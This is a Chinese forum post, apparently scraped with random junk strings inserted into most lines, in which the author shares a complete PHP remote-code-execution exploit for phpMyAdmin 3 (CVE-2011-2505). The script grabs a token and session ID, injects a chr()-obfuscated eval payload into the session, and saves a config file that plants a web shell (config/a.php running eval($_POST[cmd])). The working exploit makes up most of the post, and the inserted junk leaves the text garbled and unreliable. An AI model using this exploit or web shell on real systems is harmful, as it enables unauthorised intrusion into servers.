最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
3 O) }5 g$ H) v! g5 z% W
6 b6 j) k* I: G: B! A昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。7 ^' @# Y$ p7 W6 i
. _2 r* Z7 [; S9 i' B/ T- K
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
% r$ q1 v9 H. M& L: u一是session.auto_start = 1;( R" _3 t- S7 c; L
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。' Z3 V$ M& p6 G6 D6 t% o
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
& G1 E' o, o3 K+ U1 l% `
% E7 e" V! n! Q3 v# F* z在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。& t3 }8 b- f/ h- r/ }+ L$ @% R5 R& [
: \( J9 D% G6 a- s X5 i. O. @
于是写了这个php版本的exp,代码如下:6 S5 P. @& S1 {& D; L7 @2 D
5 U; r7 @8 E7 e' d, A6 D; [#!/usr/bin/php5 J. {7 [; R: W
<?php
# u3 ? n" V4 e/ H* k" @ n8 G0 zprint_r(': k8 W" h2 e4 r* m6 z2 t# R
+---------------------------------------------------------------------------+
) q4 G, _; R, h; d; `' @- l8 Upma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
# w" l7 R6 t4 Z. a: |, M6 `by oldjun(www.oldjun.com)
* x( O( G: ^3 i, w! C; y. ~welcome to www.t00ls.net
2 M8 Q# Q! y1 Kmail: oldjun@gmail.com
7 i4 c: Q; }1 UAssigned CVE id: CVE-2011-2505: [( x! {0 p, c$ f: ^
+---------------------------------------------------------------------------+
4 r: Z( Q5 T/ r% Q2 I) o');; B; J j+ t4 | a0 o
2 C9 w, E* ^/ r
/**$ c3 r9 x% Q: M: ^. `
* working when the directory:"config" exists and is writeable.
7 j# n5 [, u: s& L" Y**/
& G" ^8 N) e" g/ _6 Y" g7 l " ~1 E5 z* h, {2 W @0 S' E
if ($argc < 3) {6 f2 c2 P. l0 X$ u, q
print_r('
. F3 M/ o" U6 d+---------------------------------------------------------------------------+
' S. y5 v" Q' |9 J0 f6 bUsage: php '.$argv[0].' host path6 y$ T" O5 W" ?- F8 b5 b
host: target server (ip/hostname)
9 q. ~; `4 g" Q6 ` [9 D) Cpath: path to pma3' \2 _* i. {# e& v x
Example:
6 W+ X# g$ b7 e; T4 D# iphp '.$argv[0].' localhost /pma/' x& e% \& c0 v7 V3 H: f
+---------------------------------------------------------------------------+
: M4 l. `2 x* h');
8 x8 x5 k @. @9 W8 t# N exit;5 C) O' ^7 y, b
}* R2 o) U* J/ H5 `. d; y
' I* q" N' X0 P, v$host = $argv[1];
9 d% ?" w) x* r' S+ y, U$path = $argv[2];/ K2 n ]9 @5 h# G# `! p
' h9 j$ H% }7 p# \7 Y; \
/**
, c8 f- |6 d$ j) \# N6 y" k0 B * Try to determine if the directory:"config" exists( F" n' I( F) ~
**/) e |/ W; g8 P7 s) l1 h
echo "[+] Try to determine if the directory:config exists....\n";/ L6 }* P3 b6 |/ e. M$ l) L
$returnstr=php_request('config/');
7 M; V+ l7 r! A: i6 [/ {$ vif(strpos($returnstr,'404')){
) ^) c: S% a7 _' ?- h7 u exit("[-] Exploit Failed! The directory:config do not exists!\n");2 v/ ^4 V; }7 G8 F
}* c* I9 A a! C& E$ F( i( P0 I2 ]8 c
8 n: n1 |6 [* W+ F' _/**
( }3 [* _( ~! f0 b0 Q * Try to get token and sessionid# U, x# a+ G0 k! X1 L
**/9 d- O% C# p6 |9 P
echo "[+] Try to get token and sessionid....\n";: h( z8 w3 R: [ S& t1 Z
$result=php_request('index.php');
6 I* z9 ^8 s! }( G0 T* ~preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);& b$ O0 w- `* j
$token=$resp[3];2 F$ }+ p# u& P
$sessionid=$resp[1];
* W1 }3 Y5 |$ zif($token && $sessionid){
7 Z/ F! m+ ]: @& ]# O echo "[+] token token\n";
. s4 C5 E/ T! I0 z echo "[+] Session IDsessionid\n";
5 L5 z# v' U5 f. _6 M}else{) v. F0 l0 l0 ]4 v( ~
exit("[-] Can't get token and Session ID,Exploit Failed!\n");7 T( w9 Z+ x. S, i; ^
}( K% a4 w7 }0 ?! [
2 F5 X8 f! i9 p2 V- Y C2 Q. E/**" p* j# g9 Q5 W2 G
* Try to insert shell into session3 ?; `7 d2 D+ J" |; V
**/
, V' B# V2 |* c# s7 M4 Becho "[+] Try to insert shell into session....\n";
7 G; p/ K( A# h" z$ L% l2 }php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
! _& e% k8 d9 G! _; [3 }
' p. _& P3 p9 e: F/**
3 K6 h- h) X7 F& [& C7 D/ j9 R * Try to create webshell( @4 F6 Z9 A# D+ v8 x
**/0 f. B( ]5 r0 M" C( x7 W
echo "[+] Try to create webshell....\n";9 U! p# e8 ^& t3 r; G
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);! T& X( n$ {1 ^! M" e0 f7 Y
/**7 x. V5 L5 H' k. w" x
* Try to check if the webshell was created successfully
! _2 O+ I/ A( ?4 s+ t3 L**/
/ X' x) T$ w" Techo "[+] Try to check if the webshell was created successfully....\n";
+ L$ `7 f9 n. H0 w" E$content=php_request('config/config.inc.php');2 V# Z# ~/ h$ Q6 A) N N8 N
if(strpos($content,'t00ls')){, M/ S) o6 [" U- U& c
echo "[+] Congratulations! Expoilt successfully....\n";( t' P- M4 u- u4 e: C7 c# c
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";' M; A; O) Q0 b$ U7 D6 |' H$ F6 [
}else{4 g( W7 v3 D8 V4 t( S# H9 q
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
1 P, P8 m. o! d}7 R2 e! D4 k8 T& i
, q M6 Z) Y& H5 j) B, B" tfunction php_request($url,$data='',$cookie=''){
' g% O, v$ Z/ n$ [5 L) q global $host, $path;9 e& ^! F7 s2 G1 z+ O6 M
5 m& Z8 n9 {# h a& r! k; ~5 m
$method=$data?'POST':'GET';
9 `1 t5 y6 P6 b3 G" x* C
6 f' D& T8 \, j+ N+ d $packet = $method." ".$path.$url." HTTP/1.1\r\n";! Q8 e" v$ |# s" i; C
$packet .= "Accept: */*\r\n";
0 }) A# \. c( D4 H $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";8 s( G' u* e/ a
$packet .= "Host: $host\r\n";
; t1 |+ x# k, C% F* K" k4 S% @* F O $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";0 [ v ^. V% \, m
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";$ a5 f7 y! b8 H D& {& V
$packet .= $cookie?"Cookie: $cookie\r\n":"";
; K @: @7 A/ }& F* [+ C9 h5 R $packet .= "Connection: Close\r\n\r\n";
! e* d. ^5 U+ Y1 ~3 z0 f- [ $packet .= $data?$data:"";
! B$ G8 T5 r- v U9 M. k* o, r) P
% p# \* m4 u# {& v* N $fp = fsockopen(gethostbyname($host), 80);
) A' U8 n% K+ E! e8 W6 ~4 @, B if (!$fp) {
# ?% W( [( s7 N* c' G echo 'No response from '.$host; die;; u8 e; t& \# `2 w2 [% a N
}
' z9 J; _7 M2 `$ ^ fputs($fp, $packet);
& m) S% Q$ f; Q, t1 G+ [6 \: D& A: D9 w6 F6 ^* ]
$resp = '';/ ~: p: \; ~4 S4 W4 M
9 C" v- g. b% @, }4 r0 e
while ($fp && !feof($fp))
4 j0 [; ]2 L$ |( }9 I2 u! c $resp .= fread($fp, 1024);
! l, r- h' ]; u7 `' V1 @$ ?) a
! m8 ]# }+ x. @. b return $resp;' `& e- S2 ~4 @9 j
}
5 d) h, q0 t3 m0 U3 X6 t- c7 ^
g2 f5 j8 W" E9 R' c, f9 i?>
! w8 J( F/ Q; G% F- p7 t/ s. |
发表于 2013-2-21 09:13:03
收藏
支持
反对